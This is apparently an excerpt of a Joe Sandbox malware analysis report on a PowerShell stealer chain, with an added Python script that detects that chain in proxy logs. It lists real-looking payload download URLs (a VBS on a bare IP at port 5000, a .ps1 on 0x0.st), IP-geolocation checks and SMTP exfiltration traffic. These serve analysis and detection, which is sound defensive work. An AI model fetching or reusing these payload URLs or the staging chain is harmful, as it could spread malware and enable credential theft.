                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07286FC0h | 13_2_07286D18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07284FF8h | 13_2_07284D50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07282030h | 13_2_07281D88
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07287870h | 13_2_072875C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07286710h | 13_2_07286468
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07284748h | 13_2_072844A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 072835E8h | 13_2_07283340
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07285E60h | 13_2_07285BB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then push 00000000h | 13_2_0728D3E3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07283E98h | 13_2_07283BF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07287CC8h | 13_2_07287A20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07282D38h | 13_2_07282A90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07288578h | 13_2_072882D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 13_2_07288968
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 13_2_0728917B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07287418h | 13_2_07287170
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07285450h | 13_2_072851A8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07282488h | 13_2_072821E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 072862B8h | 13_2_07286010
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 072842F0h | 13_2_07284048
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07284BA0h | 13_2_072848F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 07286B68h | 13_2_072868C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then mov ecx, 000003E8h | 13_2_072E7808
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then mov ecx, 000003E8h | 13_2_072E7579

                  Networking

                  Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 5000
                  Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49708
                  Source: global traffic | TCP traffic: 192.168.2.5:49708 -> 45.200.149.104:5000
                  Source: global traffic | TCP traffic: 192.168.2.5:49833 -> 198.54.122.135:587
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox View | IP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown | DNS query: name: checkip.dyndns.org
                  Source: unknown | DNS query: name: reallyfreegeoip.org
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49774 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49876 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49903 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49967 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50015 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49930 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50024 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49985 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50031 -> 193.122.6.168:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50062 -> 158.101.44.242:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50068 -> 158.101.44.242:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50091 -> 158.101.44.242:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50082 -> 158.101.44.242:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50088 -> 158.101.44.242:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50078 -> 158.101.44.242:80
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49730 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49941 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49881 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50045 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50095 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50061 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50056 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50076 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50035 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50026 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50052 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50089 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50007 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50086 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50069 -> 168.119.145.117:443
                  Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50021 -> 168.119.145.117:443
                  Source: global traffic | HTTP traffic detected: GET /8-5S.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /download/nova_kaycee.vbs HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 45.200.149.104:5000 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: unknown | TCP traffic detected without corresponding DNS query: 45.200.149.104 (46 connections)
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 datagrams)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848DB6381 URLDownloadToFileW,4_2_00007FF848DB6381
                  Source: global traffic | HTTP traffic detected: GET /8-5S.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive (16 identical requests)
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (7 identical requests)
                  Source: global traffic | HTTP traffic detected: GET /download/nova_kaycee.vbs HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 45.200.149.104:5000 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive (35 further identical requests)
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (21 further identical requests)
                  Source: global traffic | DNS traffic detected: DNS query: 0x0.st
                  Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic | DNS traffic detected: DNS query: mail.privateemail.com
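The requests listed above form a recognisable staging chain: an external-IP check against checkip.dyndns.org with a hard-coded IE6-era User-Agent, a lookup of that IP at reallyfreegeoip.org (the "detect the country of the analysis system" signature), PowerShell fetching 8-5S.ps1 from the paste host 0x0.st, and urlmon (URLDownloadToFileW in powershell.exe) pulling nova_kaycee.vbs from a bare IP on TCP port 5000. The Python below is an added example, not part of the Joe Sandbox report, showing how to turn those observations into a proxy-log detection that correlates the stages per client instead of alerting on any single request. The log line format, the client addresses and the two benign lines are constructed for the example; the stage names and the three-stage threshold are assumptions of this example, not something the report defines.

```python
import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample proxy log (not taken from the report): client, method,
# URL and quoted User-Agent per line. The first four lines mirror the request
# shapes the sandbox observed; the last two are benign noise, including a
# curl hit on checkip.dyndns.org that must not fire on its own.
SAMPLE_LOG = """\
10.0.0.7 GET http://checkip.dyndns.org/ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
10.0.0.7 GET http://reallyfreegeoip.org/xml/8.46.123.189 "-"
10.0.0.7 GET http://0x0.st/8-5S.ps1 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
10.0.0.7 GET http://45.200.149.104:5000/download/nova_kaycee.vbs "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0)"
10.0.0.9 GET https://www.example.com/index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
10.0.0.9 GET http://checkip.dyndns.org/ "curl/8.4.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>[A-Z]+) '
    r'(?P<scheme>https?)://(?P<host>[^/:\s]+)(?::(?P<port>\d+))?(?P<path>/\S*) '
    r'"(?P<ua>[^"]*)"$'
)

# User-Agent fragment the sandbox saw on every checkip.dyndns.org request. It is
# hard-coded in the stealer; no current Windows host sends an IE6 / NT 5.2 UA.
LEGACY_UA_MARKER = "MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705"
SCRIPT_EXTS = (".vbs", ".ps1", ".js", ".hta", ".exe", ".dll")


def parse_line(line):
    """Return a dict of request fields, or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # Default the port from the scheme when the URL does not carry one.
    rec["port"] = int(rec["port"]) if rec["port"] else (443 if rec["scheme"] == "https" else 80)
    return rec


def is_ip_literal(host):
    """True when the Host is a bare IP address rather than a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def classify(rec):
    """Map one request to the stage of the observed chain it resembles, if any."""
    host, path, ua, port = rec["host"], rec["path"], rec["ua"], rec["port"]
    if host == "checkip.dyndns.org" and LEGACY_UA_MARKER in ua:
        return "external_ip_check"
    if host == "reallyfreegeoip.org" and re.fullmatch(r"/xml/\d{1,3}(?:\.\d{1,3}){3}", path):
        return "geoip_self_lookup"
    if "WindowsPowerShell/" in ua and path.lower().endswith(".ps1"):
        return "powershell_script_fetch"
    if is_ip_literal(host) and port not in (80, 443) and path.lower().endswith(SCRIPT_EXTS):
        return "script_from_ip_nonstd_port"
    return None


def find_staging_chains(log_text, min_stages=3):
    """Group stage hits per client and flag clients showing at least min_stages
    distinct stages. Returns {client: sorted stage names} for flagged clients only."""
    stages = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stage = classify(rec)
        if stage:
            stages[rec["client"]].add(stage)
    return {c: sorted(s) for c, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for client, seen in find_staging_chains(SAMPLE_LOG).items():
        print(f"{client}: {', '.join(seen)}")
```

Matching on the literal UA string and on the two public-IP services is the brittle part; the durable signal is the correlation, which is why the verdict requires several distinct stages from one client rather than any one request. The per-stage rules can be swapped for whatever the proxy already tags (WindowsPowerShell UA, bare-IP hosts, non-standard ports) without changing the correlation logic.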
                  Source: powershell.exe, 00000004.00000002.2286656043.00000129710DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbs
                  Source: powershell.exe, 00000004.00000002.2286656043.00000129710DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbs#Q.
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971302000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbsC:
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971367000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbsLMEMhH
                  Source: powershell.exe, 00000004.00000002.2286656043.00000129710DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbsnP
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.200.149.104:5000/downlx
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndn
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A917000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A39A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
                  Source: powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2793833295.00000000072A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                  Source: powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/F
                  Source: powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/SF
                  Source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/U
                  Source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
                  Source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/mhC
                  Source: powershell.exe, 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/xC
                  Source: powershell.exe, 0000000D.00000002.3706712881.0000000007600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008474000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2727828082.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2743365058.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2829344708.0000000003035000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 0000001E.00000002.2807890146.00000000080B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                  Source: powershell.exe, 00000016.00000002.2806054422.0000000008008000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microZM
                  Source: powershell.exe, 0000001E.00000002.2809296079.0000000008115000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 00000016.00000002.2783605754.0000000007226000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftBN
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3706712881.0000000007660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.00000000059B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.privateemail.com
                  Source: powershell.exe, 0000000D.00000002.3581168810.000000000498F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/r
                  Source: powershell.exe, 0000000D.00000002.3581168810.000000000498F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.micrph
                  Source: powershell.exe, 00000004.00000002.2277973567.000001291007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2256554040.0000012901A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2277973567.00000129101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000D.00000002.3706712881.0000000007600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3706712881.0000000007660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.00000000059B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000004.00000002.2256554040.0000012900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005010000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129017A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000D.00000002.3581168810.000000000498F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or22
                  Source: powershell.exe, 00000016.00000002.2732319996.0000000004C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
                  Source: powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8-5S.ps1
                  Source: powershell.exe, 00000004.00000002.2256554040.0000012900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
